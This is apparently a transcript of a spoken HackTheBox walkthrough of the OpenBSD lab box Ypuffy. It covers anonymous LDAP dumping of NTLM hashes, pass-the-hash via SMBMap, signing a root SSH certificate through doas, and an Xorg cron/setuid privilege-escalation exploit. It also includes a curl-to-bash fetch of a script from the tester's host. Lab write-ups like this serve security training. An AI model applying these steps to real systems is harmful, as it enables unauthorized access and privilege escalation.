What's going on YouTube? This is Ipsec. I'm doing Ypuffy from HackTheBox, which was a really fun box, and a lot of people asked, why the name Ypuffy? My guess is it's just because it's an OpenBSD box, and the OpenBSD mascot is that blowfish, and his name is Puffy, so I'm guessing that's where the name comes from. The actual exploit path of this box was pretty cool. It started off with the scan. You see HTTP, LDAP, and SMB. You notice that LDAP is misconfigured to allow anonymous binds. You do a dump on LDAP. You notice it actually gives you the NTLM password hashes of users. You can do a PassTheHash against the SMB service and get the private key to log in via SSH. When you log into the box and check its SSH configuration, you'll notice that it's actually checking a certificate authority to see if that authority signed SSH keys, which is unique. And you can do a DoAs command to run as the certificate authority user, so you can sign a SSH key, say it's from the root user, and then just log in as root. If you didn't poke around the SSH configuration stuff, there is another way to privesc via a CVE. I think it's in the Xorg package. We'll also do that. And before we get into this, I do want to give a shout out to Recon InfoSec. They run a lot of the Blue Team villages for allowing me to use the Wireshark image that's actually a sticker. And the link to the store is in the description below. And you'll understand why I'm including a Wireshark image in just a second. So let's go into the box. As always, we're going to begin with a NMAP, so nmap-sc for default scripts, sv, enumerate versions, OA, output all formats, put in the nmap directory and call it Ypuffy. And then the IP address, which is 10.10.10.107. Can take some time to run, so I've already run it. Looking at the results, we see a few ports are open. We have SSH on 22. It's running OpenSSH 7.7. We have HTTP on 80. It's running OpenBSD HTTPD, which is a new OS for us. We haven't really done any enumeration for OpenBSD before. And then we have SMB on 139 and 445. And finally, LDAP on 389, and it allows anonymous bind, which is unique. But first, let's just try to figure out which version of OpenBSD this is, and we can do this by just finding out when OpenSSH 7.7 was put into OpenBSD. So let's go to Google, type OpenBSD, search OpenSSH 7.7, go here, and then just scroll for 7.7, and we see April 3rd, 2018. So let's just search for OpenBSD release history and see when each version was released. So we have these threes. So we have 6.2, which is 9 October 2017. We have 6.3, which is 2 April 2018. And I think this is the deprecated date or supported until. So chances are it's not 6.2 because OpenSSH 7.7 came out after this. Oh no, it came out before this. I misspoke there. Ignore what I said. Anyways, 6.2, 9 October 2017. 6.3, 2 April 2018. 6.4, 18 October 2018. So looking at this, we have 7.8, which is August 24. So chances are 6.4 probably is going to be using OpenSSH 7.8 or later. So we're left with either 6.2 or 6.3. I'm going to guess that it is 6.3. So that is how we enumerate the BSD version, or at least just guess it from the information we have. The next thing to do, let's just poke at the web server because, well, we always poke at web servers first. So let's go to 10.10.10.107. And we get nothing. So I'm going to send this over into burp, turn intercept on, refresh this page, go to burp, send this to the repeater tab, click go, and we're not getting anything back. We can try changing the request method to post request, click go, not getting anything, and it's odd because NMAP was able to tell that this was OpenBSD, and I don't know how. So what I'm going to do is let's open up Wireshark and sniff the traffic and see exactly what NMAP is doing. So let's go here, let's resize our Wireshark window. Scroll down. Okay. Listen on ton 0. And then we want to do the Wireshark again. So nmap-p 80 to specify port 80, and then run the same enumeration scripts. Let's not do any host detection. and then the port. And that $PN, that's just not going to do like an ICMP to make sure the host is alive and things like that. So if we look at Wireshark, we see the request. We can sort it by HTTP and then follow the request. And we see Wireshark's doing a GET and then getting nothing back. So that is odd. Going back to HTTP, we can see a 400 error message gets responded by the server. So if we follow this, we see we sent it nothing. If we go to TCP stream 7, it's kind of the same thing as, oh, we set it junk and then it responded with 400 bad request. So if we go back to a window, netcat to 10.10.10.107 port 80, send it junk, that's not a valid request, we get nothing. If we just send it a blank line, it gives us the 400 request back. So we can also emulate that in Burp Suite, send it no request whatsoever, and click go. Blank line, click go, and we get 400 bad request. So if we send like periods, like NMAP did, we get that. If we send it ASCII, I think it just hangs. Send this. Oh no. So as long as it's not a valid HTTP request, we're golden. And we can get that it's an OpenBSD box. But if we can't do any legitimate HTTP request to this, there's not really anything we can do to further enumerate this until we find out more information about the web server. So let's go back into our NMAP stuff. And the next thing I want to look at is this anonymous bind OK. So we're going to start by using a tool called ldapsearch. We'll do -H so we can see the options, and we're going to want the simple authentication. This is going to be the anonymous bind, and then -H for host, and I use -H for help. I wonder if I just put anything here. I can't do -P. So if we just error out, we get the help thing. So I don't know exactly what help is for ldapsearch, but if you just do -H, it errors out and prints help. So easy way to remember that. That's how I do it. So -X for anonymous bind or simple authentication, -H and then the IP address, and we connect to the LDAP server. We get no such object. And we get that because we're not specifying an actual LDAP query. For an LDAP query, you need to know the base DN, the distinguished name. It's not like a directory structure where if I just do ls/, it shows me everything. And LDAP, you have to know the base DN. And I don't know how to enumerate the base DN with just LDAP search, but we're going to find out. So I do know that NMAP scripts will enumerate the base DN. So we're going to do a Wireshark against NMAP scripts, and then figure out how that script is working and apply it to LDAP search. So let's do locate NSE $ to list all the NMAP scripts, or I think we need -R for regex, and then search for LDAP. So we're going to do this LDAP-root DSE script. So do nmap-p 389 --script root DSE -PN, so we don't do any host discovery, and then just 10.10.10.107. Before we run this, I do want to clear my Wireshark history, and we'll start this over. Get rid of TCP stream, and click go. And we see the naming context DC, HTTP, and HackTheBox. So it does search this. And I was thinking NMAP would display more information. So let's do that locate again. And let's do LDAP search instead of root DSE. So LDAP search. I typed LDAP twice. And this is the information I was expecting to see. So if we have the root DSE and we search it, we can get the contents of, I guess, the directory or whatever you want to call it in LMAP, all the distinguished names and objects. So let's look at exactly what happened in Wireshark. Nothing? That was odd. Let's try this again. Search this. Okay, my filter I just had hit enter on. So let us search for LDAP, and we can see what the queries are. So let's follow this TCP stream, and that is probably nothing. So let's do TCP stream equals 2, and we see LDAP stuff. So if we follow this, we can see us requesting something. We're making a request right here, and then the server is responding with the DC. I forget what DC stands for. This is going to be like the base DN for LDAP, and maybe distinguish something. Let's see. LDAP, what is DC? Disable burp. And I need to fix my Java dependencies on this VM. Let's see, DC top LDAP tree. Doesn't say what it is, but the very top is this. Domain component is what DC stands for. So it's the top of the tree. So we need to make our LDAP search appear like this. So if we go to this query, the very first one, we can see LDAP message, search request, and this is the scope our LDAP search has to be. So remember TCP stream equals 2, because we're going to do LDAP search, and go back to Wireshark, go to the very bottom one, and we'll follow this stream, and we have a request. So let's open this. Packet 58. And I should have opened the other one. So let's go back to TCP stream 2 and open, I think it's this request. This one. And look at these side by side. So we're looking at LDAP. Message ID is different. Search request is the same. Scope, base object, ers. So the right is LDAP search. So our scope is the whole subtree. This scope is base object. So let's try changing that. So go back here. Get rid of this so we just see the help. And we got to figure out how to change the scope. So I know it's -s. I thought it was -s. Let's see. Yep, lowercase -s. I guess my search wasn't working, but scope. And then we can choose base, sub, or children. So we want to do -s base and see what happens. So we get success. It's not outputting anything because we didn't give it a distinguished name. So now we just have to figure out how to get the distinguished name. So going to Wireshark, let's see what else is different. So these are the same, size is the same, false is the same. Filter, we're both filtering on object class. And then if we go down, we have attributes, and we're not searching naming contexts. So if we do LDAP search, naming context, let's see what this is doing. So we have the LDAP query here. They're specifying the port as 3060. But at the very end, they just type naming context. So let's do that and see what we get. And there we go. We have it returning DC HackTheBox, comma DCHTB. So that's just the HackTheBox.htbdn. So now we want to do another search. So let's close out this one and see what NMAP did to pull data. So I'm guessing it's going to be these queries. So let's open this. That's nothing. Open the next one. And it's making quite a few. So LDAP search. I'm going to just close this and let's search real quick. We want TCP stream 21 or packet 21. Let's see. This query, searching with the base object, and what does this return? Because I think it was giving us too much at first. Yes, this is what we want. So let's see. We want the base object in a search. That's the one that we aren't doing yet. So if we look, we have ldap search result, and we're searching this, and we're searching just root here. So we want to specify this query. So this is the base object, as it says right here. And if we look under search request, we see no base object. So going back into this, we can see base object, I believe, is -b. So let's see. -b. There we go. Base DN. So that's the base distinguished name. Maybe not base object, but let's try that. So do -b. DC is equal to HackTheBox. DC is equal to HTTP. Get rid of naming context, and now we're just searching. So now we probably have to specify a filter or something on a search. Let's see. Did this return information? Go back in Wireshark. Follow this. And it should return information. So let's compare what our ldap search is to the actual query again. So let's do ldap search. Let's just make sure everything's good. Let's do naming context. Does this change anything? Does not. So let's see what is different between this ldap search query and the one NMAP had done. So close both of these. Open this one. Then we want to just search ldap and grab the very last query, because that should be us. So maybe this one. Move this over. And let's see what is difference between these two. We have ldap message, and we have two ldap queries here. Search request, search entry. So the scope is the whole subtree, and our scope, I believe, is just base. I don't see it in here, but we know we specified base, so I probably have the wrong packet. ldap search is probably doing multiple requests. So here we just have the scope as the base object. This is the correct ldap we wanted. So we want to get rid of base object. We want it to be a whole subtree. So let's just get rid of -s base and do sub. And now we're dumping the information we wanted, just like NMAP search. So hopefully that was easy to follow. It's turned out to be a little harder to explain than I thought because of picking the right packet, and I don't use Wireshark all that much. But that is a valuable skill if you don't really know how to analyze the programming language of a script. I don't know whatever NMAP does. I've never created an NMAP script, and I wouldn't be able to analyze that, but I can look at the wire and kind of try to mimic what the thing does. So that's just a good way to kind of find out what a tool is doing. So now that we have the NMAP information, let us just go and analyze it. So let's look through this and see what we have. A bunch of SMB information, which makes sense because the server was listening on SMB as well. So we have the distinguished name Ypuffy, and then a bunch of stuff. This looks like password requirements, like history length, login to change password, max age, min age, stuff like that. So this looks like maybe the domain password requirements. We do have Alice, and her user password is base64. So let's go echo-n base64-d, and it just says crypt. So that doesn't really make much sense, but let's just keep going up. So Bob, and this is the same exact base 64 as Alice, so I'm going to ignore this. We have group, we have Alice, and we have a Samba NT password, and this looks like it's just a NTLM hash. Go to Bob, user password, and he has this base 64, so let's go look what this is, because that's not the same length as the other ones, and BSD auth. So that's not too interesting. And that's the end of the NMAP information. So we do have information for Alice and a SMB NT password. So let's see if this is a valid password for Alice with a PassTheHash. And the tool SMBMap can do this. So we do -u, Alice, what was it, 19 something, 1978, -p, and we want the hash. And if you don't want to remember what the LM hash is, you can just do the NTLM twice, because the LM hash is just blank. It's this AAD3B435B541 stuff, and then AAD. But that's normally irrelevant now. I normally just paste the NTLM hash twice, and most tools accept it, because computers ignore the LM hash. So it's just a requirement in the packet. Doesn't really mean you need it. So the host is 10.10.10.107. And we can look, and we see we have a Alice share, and we have read-write access, and the IP share, we have no access. So from this, I can tell that Alice is probably not a local administrator to this box, but she does have a share. So I'm going to do -r list to list what is, oh, whoops, -r, I think it's just -r, to list the contents. That is recursive. So now it's going into each share and then listing the files. And we have a file called my_private_key.ppk. So let's download that. So if we do SMBMap grep download, and we just have --download. So --download, probably Alice my private key.ppk. See if it downloads this. It looks like it does. So we can cat this file out, and we see it is a Putty user key file. So I'm just going to do apt install Putty tools, and alternatively you could just open up Putty on Windows and then import the key, but I don't like using Windows if I don't have to. So I'm just going to install the Putty tools, which gives me a way to convert this Putty key into a regular SSH key, and then we can go and use that. So now that the package is installed, we can just do PuttyGen -h, and then we're going to want to do the key file, then -o, capital O, and we want, I don't know what the difference between new format and old format is, so I'm just going to do the old format, and then -o for the output file, and we'll call this alice.pem. And then do ls, we cat alice.pem, we have this. And I want to try OpenSSH-new. I'm kind of curious what this is. So less alice-new.pem. RSA, OpenSSH private. I'm not sure. Oh well, this is an OpenSSH private key, and the other one is RSA private key. So let's just do chmod 600 alice.pem and try SSHing as her. So SSH alice.pem 10.10.10.107. And permission denied. Let's try actually specifying the username. And then I think it was Alice 1987. What was the username? Do I have this correct? Let's see. Alice 1978. Additionally, I believe the SSH enum users would work. Let's just test this out. So search SSH underscore enum, use this module, and then we want to show options, set our host to 10.10.10.107, set username root, and run this, and we'll see if it says root is a valid user. Set username to please subscribe, and we'll see if this says invalid user. And if that's the case, then yes, this would have worked. So we do have please subscribe's not found. So let's go back here, let's search, let's grab Bob and do Bob8791, see if he's a valid user in the box, and Alice1978. So v users.lst root Bob Alice1978, and then we can also do Ypuffy, which was the domain name. Exit this, set user file user.list, and we can unset username. Run this. We got root found, Bob found, Alice found, and Ypuffy not found. So it is vulnerable to that SSH enumerate users thing, but not really needed because we had already got in with the private key. So let's take a look at what we can see. We got the user.txt, and we can look at this. And then there's also this windir directory, and that's just the SMB share. So let us run LinEnum and see if LinEnum actually works on this. I'm not sure if it will because it is BSD. So let's do opt LinEnum python-m simple HTTP server. And then we also want to look at what my IP address is. It's 10.10.14.3. So curl 10.10.14.3 linenum.sh and execute it with bash, but we forgot to specify port 8000 and to linenum.sh. Okay, bash, execute this, sh, execute this. There we go. So we don't have all the pretty colors, but it looks like it is doing its job. I bet if we did like KSH, I think that's what BSD uses, we may have got colors, but we can ignore that. So we got OpenBSD, user group, who else is logged in? Just us, group memberships, the PassWD file, looks like we have password hashes in etc passwd. I think that's just LinEnum not realizing this is BSD because everything was star. We do have a user called user.ca, so that is odd. This is another passwd thing. Files owned. Let's see, that is taking a while. So I'm just going to kill this. I'm not sure how long that LinEnum would take, but we don't have sudo on BSD. Instead, BSD uses something called DoAs. And I don't know if there's a DoAs list like there's a sudo-l, but we can read the etc DoAs file and see that Alice1978 as the Alice1978 has permission as user.ca to run the command user bin SSH Keygen. So let's go and look at GTFO bins and see if SSH Keygen is one of them. So we do SSH Keygen and we don't have anything. So let's take a look at the everything else. So we have Bob, look at this, DBA, and we got a SSHAUTH.SQL. And looking at this, we don't really have anything. We have create table principals, UID text. It's just a database. And this kind of reminds me of we had a web server once upon a time, but we just couldn't access it. So if I curl 127.0.0.1, and we don't get anything. So we should try to find out exactly what this web server is. So if we go var www and find dot, let's see what we can see. htdocs. So if we curl 127.0.0.1 bgplg, empty reply. So let's try Etsy and go to httpd.conf and see what this has. We don't have vim. Whoops. Less httpd.conf. And we can get the Apache configuration. We have location star block drop. So this is why when we just curl localhost, we get nothing. We have location SSHAUTH. It's passing it to a WSGI object, and location /userca, which is that userca user. So let's try a curl 127.0.0.1 userca. We get moved permanently, and it is moved to, where's location? We probably have to do -v to see location. So the location, we just need to add a slash. And then ca.pub, so we can get the user certificate key, I guess. So that's interesting. And then the other one was SSHAUTH. If we curl this, we just get a 400 error. If I do ps-ef, it's BSD, so all the flags are different. So let's try ps-aux, and we see, let's see, can we just aux? Let's see, we got Postgres, so that's the database dump we saw in Bob's directory. More stuff. Verlog SSHD, SSHAUTHD, and the init file or configuration file is in var appserv. So let's cd verlog and see if we can read this SSHAUTHD file. We cannot because it's owned by root and the group is wheel. We're neither of those, so we can't read. Let's go to var appserv and permission denied. So everything keeps saying something about SSH. So I'm going to check the SSH config. So etsy SSH SSHD_config. And we can see stuff about the web server now. We have authorized key commands and authorized principals commands. And it's curling 127.0.0.1 SSHAUTH type principal username equals you. And this one is doing the same thing with, instead of principal, it is key. So that is interesting. Let us see what happens when we curl this. So if we do curl, we just double curled, username equals root. We probably have to specify that in quotes. So let's do username Alice1978, and we get what looks like to be a public key. So we do ls.ssh or cd home.ssh, and we don't have the public key here. So we can go back to our host, and instead of doing LinEnum, let's do ssh-keygen-f alice.pem, and I think this will output it. Generating public key pair. Let's do yes to overwrite blank key, and let's see. We got cat alice.pem.pub. Is this going to be the same key? It is not. But is it always going to be the same key? I'm not sure. pem.pub. Let's see. No, it is not. So what I'm going to do, let's try something else. Let's copy this, and let's do let's verify I didn't just clobber the SSH key. So SSH-I alice.pem, alice 1978 at 10.10.10.107. And I did clobber the key. So let's do PuttyGen. Crap. Let's exit this because I have the PuttyGen command in this window. And then we don't want new. We just want alice.pem. And let's do alice.pem.pub. Okay. And then let's try SSH-keygen-lf on alice.pem. And then we want alice.pem.pub. And we can see the SHA-256 hash for both of these keys is the same. So this public key is the one that goes to the private key. So hopefully that makes sense. I'm sure there's a way to generate the SSH public key just from the private key. I just forgot all the flags. But SSH-LF will tell you the SHA-256. And if these match, then the public key goes to the private key, because the two files, the alice.pem and the alice.pub, alice.pem.pub are certainly different. So chmod 600 alice.pem. Let's get back into this box and keep looking at the SSHD config. So the key thing we wanted was authorized. So let's just make this easy. Clear the screen, cat this, and grep for authorized. And we know a way to get the public keys out of the users. Let us see what this is, the principal thing. So if we can just copy the whole thing. Copy, paste. We'll do alice 1978. I forgot we have to put this in quotes because Bash is seeing this ampersand sign and then trying to process it. So doing this with the principal and the username alice1978, it just gives us alice1978 back. So let's cat etc passwd and let's awk-f print 1. So this just gets us all the users. If we grep Bob, that doesn't get us all the users because Bob and Alice are not in etc passwd. Etc, let's see. Grep Alice star. And where is passwd? Maybe it's pwd.db, but that's probably something. Let's see. I hate BSD. So let's see. How do we just dump usernames out of BSD? I bet it's that pwd.db. File, what type of thing is this? Berkeley DB. Let's just go to Google and search OpenBSD list users. List all users of a system. Let's see. Get ent passwd. Okay, that did some type of magic, and we do have usernames at the bottom of passwd. Did I just miss that before? No, they are not there. Okay, I'm not sure exactly what getEnt is doing, but let's do getEnt passwd grep-v. We don't want anything that begins with an underscore, and this looks like a good way to get users. So let's do this, and then awk-f print 1. Okay. SSH to do principal. So now we can just combine those two commands. So for I and this. So looping through every user on the box. Do this command. And I'm going to do this in a double quote so we can process the variable I, and then done. So now we got all the principals, and we got a weird one, emergency backdoor, Alice and Bob. So let's go back to this and do echo-n I colon. So now we have principal as root, and it's going to be emergency backdoor. So if we just did that curl command, probably just copy it easier. Principal and user equals root. What was it? There we go. I've got the polls, but we got the emergency backdoor. So if we take a look at exactly how SSH CAs work, SSH CA user authentication, and read a bunch about this. You could also just search for cat, let's do grep authorized. If we search for this command, and we just look up a bunch of tutorials on SSH CAs, we'll realize that SSH has, I guess, 30 ways to authenticate. Maybe it has more, but I learned about this third way from this box. You have the keyboard authentication, which is just typing the password. You have SSH key, which is that SSH key that we provide, how we logged in with Alice. And then there is this as a certificate authority. So the SSH client will search when you give it a pub key, also searches for the -cert key, and then if it has it, it sends that key. And that key is just signed, I guess is the easiest way, and it tells the server what that key is. So maybe easier to do or understand once we actually do this. And the reason why I'm going down this path is if we do cat etc DoAs, we see that we're allowed to run SSH Keygen, which allows us to sign SSH keys. So let's create a key with the name root. Whoops. Let's just go to our home directory, and we'll make the directory ipsec, and then let's just create the key. So this command is going to create root and root.pub. They are chmodded or already, and if we try to SSH with root to root at localhost, we get nothing. It's denied. However, we can do as -u user ca user bin ssh -keygen -s /home user ca, or we could just grab the I'm not sure. We want the CA's private key so we can sign something. So my bad for that. Let's just redo this. So we want do as -u user ca user bin ssh keygen. Then we want -s, which is going to be the signing key. So home user ca -n, this is going to be the principal name. So emergency, I think it was backdoor like that. And what else do we need? Just going to specify the file name. And not permitted. Keygen. Must specify a key ID when certifying. So key ID can be anything. It's just how keys are identified. So I'm just going to label it please subscribe. And unable to sign root. because I'm in the CA directory, I want to go into IPsec as well. And now we should be able to assign root. Permission denied. Delay. Let's see. chmod 777. IPsec. So it couldn't create that key because it's doing a DoAs as user CA, and user CA did not have write permission. So now we sign the user key root-cert.pub with the ID please subscribe. So if I do SSH-I root at localhost, we get in. So what exactly is happening here? So we do have 3 keys. We have root, root-cert, and root.pub, and we're sending the server both these 2 keys. And the server, if we do SSH key gen -L, I think LF root, yes, and root-cert, we can see all 3, if we do root.pub as well, all 3 have the same exact SHA-256 sum. So notice all 3 of these keys are tied together. If we do -L on a root-cert.pub, we can see information about how it's signed. So we can see the key ID, it doesn't need this, is just please subscribe. It sees the principal is emergency backdoor, and it also sees it's signed by the CA, which it trusts. So when we authenticate to the server, it's going to do a grep authorized. It's going to do this command, this user bin curl on SSHAUTH, and username is equal to root, because that's who we're trying to log into. I always forget to do these quotes around this. And it's going to see, okay, if this certificate says emergency backdoor as the principal, it is a valid root certificate. And that's exactly how that works. It does that. It sees the principal's emergency backdoor. It sees it's signed by the CA which it trusts. And it's like, okay, this is a valid certificate. Let's let them in. So that is that piece of the box. And if you also looked, if we do uname-a, there is a unintended privesc. I think it came out after this box. We do see it is OpenBSD 6.3. So our thought pattern at the beginning of this box is correct, that it's 6.3. And that's valid because if we look at OpenBSD 6.3 privesc, there is a few privesks, not StatClash. Search Xorg. And exploit DB. Let's see, is this it? I don't think this is it. Let's see. What if we just do search exploit OpenBSD and grep for 6.6? Don't get it. Let's see. Easy to exploit privilege escalation bug bytes OpenBSD. Hacker fantastic. Let's see. Is this it? This may be it. So CP downloads, what was that file name? OpenBSD 0 day. Let's list this file. And we can just copy and paste all these commands. So it's creating the file XSH, doing something with Xorg, and creating a cron to do something. Let's see, build date October, so this is probably going to work. This is different than the one I was thinking of. But let's try this. Sleeping for 120, so it's waiting for the cron tab to run. And while that does that, let's see if we can see what this is doing. So do we have a description to create a cron tab entry as root? So let's see, it's creating temp.xsh, and it's copying bin ksh to user local bin xshell2, giving it a set UID bit, and then going to make the XSH script executable. It's putting this in the cron, sleeping 5, killing Xorg, sleeping 2 minutes, and then running it, and this file should give us the set UID bit, or give us root. So let's just let it wait for the 2 minutes and see if it actually does work. The 2 minutes is up, and we see we switch from the $sign to the £sign, so it looks like we are indeed going to run as root, and we can get root.txt as well. So that is the 2 ways to root Ypuffy. Hope you guys enjoyed the box. And actually, let's just look at var app serve real quick and see how SSHAUTH works. I got some time. So we got 3 files. We have actually 4 files, but one is compiled Python, so I ignore it. So let's look at the sshauthd.ini, and this is the initiation file. It just runs this WSGI. So if we cat this, we see that's just going to import this Python application, which is just a Python Flask that's using, looks like, Postgres based upon that module. We do have a fetch data. We have a route for SSHAUTH. Method is get requests. If the type query type is principals, run this SQL command or Postgres command. And if it's not that, then run keys. And that is it. So, hope you guys enjoyed the video. Take care, and I will see you all next week.